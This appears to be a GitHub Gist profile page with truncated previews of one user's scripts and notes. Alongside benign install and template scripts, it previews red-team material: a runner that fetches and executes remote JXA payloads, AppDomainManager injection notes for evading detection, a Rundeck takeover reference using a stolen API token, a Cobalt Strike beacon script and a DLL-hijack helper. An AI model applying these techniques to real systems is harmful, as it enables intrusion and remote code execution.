Skip to content

Instantly share code, notes, and snippets.

Avatar

Noah thesubtlety

35 followers · 40 following
View GitHub Profile
@thesubtlety
thesubtlety / getgo.sh
Created January 5, 2023 20:15
Install go to home dir on debian
View getgo.sh
#!/bin/bash
# Install golang to home dir
GOPATH="$HOME/go"
GOUTIL="$HOME/.go"
LATEST="$(curl -s https://go.dev/VERSION?m=text)"
DL_PKG="$LATEST.linux-amd64.tar.gz"
DL_URL="https://go.dev/dl/$DL_PKG"
wget "$DL_URL" -P "$GOUTIL"
rm -rf "$GOPATH" && tar -C $HOME -xzf "$GOUTIL/$DL_PKG"
export PATH=$PATH:$HOME/go/bin
@thesubtlety
thesubtlety / template.sh
Created November 18, 2022 23:43
shell script template
View template.sh
#!/usr/bin/env bash
# https://sharats.me/posts/shell-script-best-practices/
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
fi
@thesubtlety
thesubtlety / jxarun.swift
Last active October 7, 2022 20:47
Run jxa from file http stdin
View jxarun.swift
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
//Usage:
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
@thesubtlety
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
View jxarunner.m
#import <Foundation/Foundation.h>
#import <Appkit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
//jxarunner file.js
@thesubtlety
thesubtlety / _notes.md
Created April 25, 2022 14:53 — forked from djhohnstein/_notes.md
AppDomainManager Injection
View _notes.md

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name

In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

@thesubtlety
thesubtlety / rundeck-commands.md
Created October 14, 2021 15:06
Rundeck Takeover Reference
View rundeck-commands.md

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.

RUNDECK="https://host"
TOKEN="x-rundeck-auth-token:<secret>"

# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .
@thesubtlety
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
View stalebacon.cna
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit https://github.com/bluscreenofjeff/AggressorScripts/blob/master/stale-beacon-notifier.cna - bluescreenofjeff
$webhook_url = "https://hooks.slack.com/services/xxxxx";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
@thesubtlety
thesubtlety / natlas-docker-howto.md
Last active August 13, 2020 23:15
tl;dr natlas/docker install
View natlas-docker-howto.md
@thesubtlety
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
View Get-Exports.ps1
function Get-Exports {
<#
.SYNOPSIS
Get-Exports, fetches DLL exports and optionally provides
C++ wrapper output (idential to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x32/x64 DLL's regardless of
the bitness of PowerShell.
@thesubtlety
thesubtlety / golang-windows-dll.go
Created February 5, 2020 05:18
Calling Windows DLLs from Go
View golang-windows-dll.go
package main
import (
"fmt"
"syscall"
"unicode/utf16"
"unsafe"
)
//https://github.com/golang/go/wiki/WindowsDLLs